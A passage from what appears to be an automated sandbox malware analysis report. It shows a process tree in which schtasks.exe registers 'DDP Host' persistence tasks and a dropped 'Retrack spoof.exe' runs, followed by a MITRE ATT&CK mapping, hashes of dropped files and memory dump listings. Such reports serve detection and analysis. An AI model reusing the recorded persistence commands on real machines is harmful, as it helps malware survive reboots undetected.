- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5072

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DDP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp15D5.tmp"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4232

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DDP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp1CAC.tmp"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1704

C:\Windows\Retrack spoof.exe
"C:\Windows\Retrack spoof.exe"
2⤵
- Executes dropped EXE
PID:112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 112 -s 1048
3⤵
- Program crash
PID:2060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 112 -ip 112
1⤵
PID:2592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb1affab58,0x7ffb1affab68,0x7ffb1affab78
2⤵
PID:2076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:2
2⤵
PID:4912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
2⤵
PID:1596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2280 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
2⤵
PID:3140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
2⤵
PID:3348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3176 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
2⤵
PID:1584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
2⤵
PID:3312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
2⤵
PID:4004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
2⤵
PID:4668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5084 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
2⤵
PID:244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4844 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
2⤵
PID:364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3188 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
2⤵
PID:4540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2752 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
2⤵
PID:3444

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3460

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
9e415fb92af655729108cac5449c9528

SHA1
d8db8cd1dba607744e0c0ec7050ed3ee5efd19d5

SHA256
1c3c5e0350a1b4b455ca91a0c5846a2342462450e1e26d24b39d9f4264f27657

SHA512
da9ab715f57709d1cdf2afbf28ebdc1de336492315ae1f0ac27154cc28aeb5ba690e0ac6ba4b9829b31528884d7b30630bdef237d03040bacae82a473f4f46c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
144KB

MD5
39f1bcf071044a9f518f1caa9524689f

SHA1
6c0fac890189ebbc101fe25b69d3d1262a087ad6

SHA256
6924d6787a0b4988af8fffecc0edca0fbf9ff32fa00267aec58b0f19a040e621

SHA512
d56e0622c4090dc2ed2c84f623755b0488be00a02d8bc08f170ba504a503e8d3c0c76e1c2c45adc2b2cfddc2124f3bdc4e917d5f3b7719a9322ad0f2ac310f19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
04a8ee401059de47c407218992b49f05

SHA1
5db67f41bbbfcd61787b3df4a637f1c2c99145fb

SHA256
c95e6dd6efa0a7d972c50898d9e6709ff532f35d656d3b720a9bd2bfa063d41d

SHA512
167ab30fcf45c7de4ab6c56f3d19746ed94552ec53c45995ba085822c9522c1d1bc59e9382e44c9c0e0a97bcaafb9913b44350186c32d74a456f57c016bbf829

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
db9c5308f6767121fa1fa7f7c31e6589

SHA1
f26b22a0ed448b85f741a46c6812b42f29ba1ec3

SHA256
2560795c0b8d4ff54d5611c0730803b4d840753feb815804d92aee572109e25e

SHA512
d97b58760ed3d3a56930eaaf7b665016323767742af65413f42148cd1e718238d20af3ec5c44c7605dfb67d463d2726f1493fb6e18a5df637f10a7f434394cc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
b58b9004cf53639da7926daf4c4527a2

SHA1
88383758daf892f9e26fee71b6fdff4f88aa218b

SHA256
30497f77129983371c74078b22b487645b230f113d1f099186afff3fb8cc97d4

SHA512
5ca26a1452c3e719247622a06ffb71f8d48a61a2dc00a675576010a375c9a7246c8cf437904f027d3679561a426f8dc0524d5212e58904e6ca38cd51d1ffd6ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
c216c7f1b14d6fdb4ac1843356edf3c4

SHA1
0d59b722be2ef39f8ee070d1ed16c98826d0867a

SHA256
161c9a69ade0c53000a5c9972ce424061ec9d2becae1062f1f912fb7e313e5f6

SHA512
42d1337664aac02d5c1ebfeee3e721672ad5c2620da8e424e2c54eea04ca634117f8916af09801c91a3ee3c4b701539ff118f1cd35f434a63722e83e5059c1ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6c47b3f4e68eebd47e9332eebfd2dd4e

SHA1
67f0b143336d7db7b281ed3de5e877fa87261834

SHA256
8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

SHA512
0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

Download Submit
C:\Users\Admin\AppData\Local\Temp\EA50.tmp\EA61.tmp\EA62.bat
Filesize
3KB

MD5
3557fd8df9f2eea025db00b6037057c2

SHA1
6c01403cfb5386f41d8ee223c267eb3e6f2f9b83

SHA256
7d97b0e1010946dd695028f47ffaccb47bce0fac5bb7dce3644865bb0fb71f16

SHA512
da78ae660a548c62d72e29442d5af4d48f36a7a16181eb6bef67a955a40a58e7fcb79d83aea35445a809b0f204164320b0a48a23b6342c2c1b0d698363b0d6bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1s22lmwm.zu2.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp15D5.tmp
Filesize
1KB

MD5
ed3053ed60029bce7a0f9346dd78af27

SHA1
e71a66591d17ba57786302055e546bd864fb918b

SHA256
5a7448b5c48843d6112ecca9e7d92f13e6f887a1674dc107144cb0188523b380

SHA512
104e67817b32d185e88918e29694daaf474866bd1b9ad64421ae70a73371c89b2deee3aa02d0cbf5ab654ca0a267b6d109ffac88bca0d97536a1e283b04591a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1CAC.tmp
Filesize
1KB

MD5
2271642ca970891700e3f48439739ed8

SHA1
cd472df2349f7db9e1e460d0ee28acd97b8a8793

SHA256
7aba66abbcb0b13455609174db23aed495a9adbef0e0acd28baa9c92445eda68

SHA512
4669a4ef8ec28cdb852ffc1401576b1bf9a9d837797d7d92bc88c18b3097404f36854e50167b309706fef400cabc43c876569ce2797ba85eb169a2783b8fe807

Download Submit
C:\Windows\Plugin (2).exe
Filesize
92KB

MD5
b5dc91de17a295dff74f04775cb4b0f6

SHA1
04b4174239e0640926e0e4baa19e3bde697e3c17

SHA256
751de7168c8a1da0803db0a0c13abb2f9f0d40d2989ca31967f329b2a4f635bc

SHA512
70c4f9e0630652369fdf4a79f459d271e1dc8a3efe6560970b1092c6e394a725a6045d8010e0cd5ced345eaa5e56f33f3c8365474bd0a3209ce3778a8db20331

Download Submit
C:\Windows\Plugin.vbs
Filesize
1KB

MD5
14ea261d44218a9791555b72a7767c29

SHA1
4bce49b19c36e59da55d95bed268450ae99f01a3

SHA256
4ead5762a374a921de330d5f2fd3ad4aaf015bc7d004d34c97740f5804085cb4

SHA512
2eae9a9e13c4137e864e75c2f22cb2761a86d6282d6f28bd06f11032a664c140d1055067ff73056d3dc0469fc44e4bbe3dc922317f0ff6d4f08551a719bf1d60

Download Submit
C:\Windows\Retrack spoof.exe
Filesize
499KB

MD5
2304b7950394e771b89b4dde4dcccff9

SHA1
e9cdb5b9b5afe2125c2086293ae20fd11129edc1

SHA256
9cdf6b9e97cb1168697b7cb4c0ae472c7d26cf867c3ba44b3c6a33fa1e6a7b43

SHA512
16bb035c8935370c876703b404712112ff68743853c3dd74f4420423f4547340b3d29f606ffc343d21ca8a47859080c3e884bc8c49c54d9b8d5f9feca996eef0

Download Submit
C:\Windows\UpdateService.exe
Filesize
203KB

MD5
23296053d543c5fce94532c2717c8710

SHA1
50edfa61b97bb2454e91d88f6c48d2b0d591d95e

SHA256
0974a318654b48f0c01caec006a8acee83243fc1b585da6c68fa24d0eb71aeaa

SHA512
36396a0aa8551a06c73cdbc661d7e5d8fe238e2f095f51657dbcf6d05ecd47e80715a863942b8c600109719640e787e797289ee0cdcfa9e20cb6cdb3f354fa81

Download Submit
\??\pipe\crashpad_2244_JKPOUCAGFQGEYXLK
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/112-64-0x0000000000040000-0x00000000000C4000-memory.dmp

Filesize
528KB

Download
memory/112-144-0x0000000004AD0000-0x0000000004B62000-memory.dmp

Filesize
584KB

Download
memory/112-158-0x0000000004C60000-0x0000000004C6A000-memory.dmp

Filesize
40KB

Download
memory/112-92-0x0000000004FA0000-0x0000000005544000-memory.dmp

Filesize
5.6MB

Download
memory/1060-11-0x000002A753EA0000-0x000002A753EC2000-memory.dmp

Filesize
136KB

Download
memory/1060-10-0x00007FFB38F30000-0x00007FFB39125000-memory.dmp

Filesize
2.0MB

Download
memory/1060-9-0x00007FFB38F30000-0x00007FFB39125000-memory.dmp

Filesize
2.0MB

Download
memory/1060-8-0x00007FFB38F30000-0x00007FFB39125000-memory.dmp

Filesize
2.0MB

Download
memory/1060-51-0x00007FFB38F30000-0x00007FFB39125000-memory.dmp

Filesize
2.0MB

Download
memory/3760-1-0x00000000007F0000-0x00000000008C0000-memory.dmp

Filesize
832KB

Download
memory/3760-45-0x00007FFB38F30000-0x00007FFB39125000-memory.dmp

Filesize
2.0MB

Download
memory/3760-2-0x00007FFB38F30000-0x00007FFB39125000-memory.dmp

Filesize
2.0MB

Download
memory/3760-0-0x00007FFB38F30000-0x00007FFB39125000-memory.dmp

Filesize
2.0MB

Download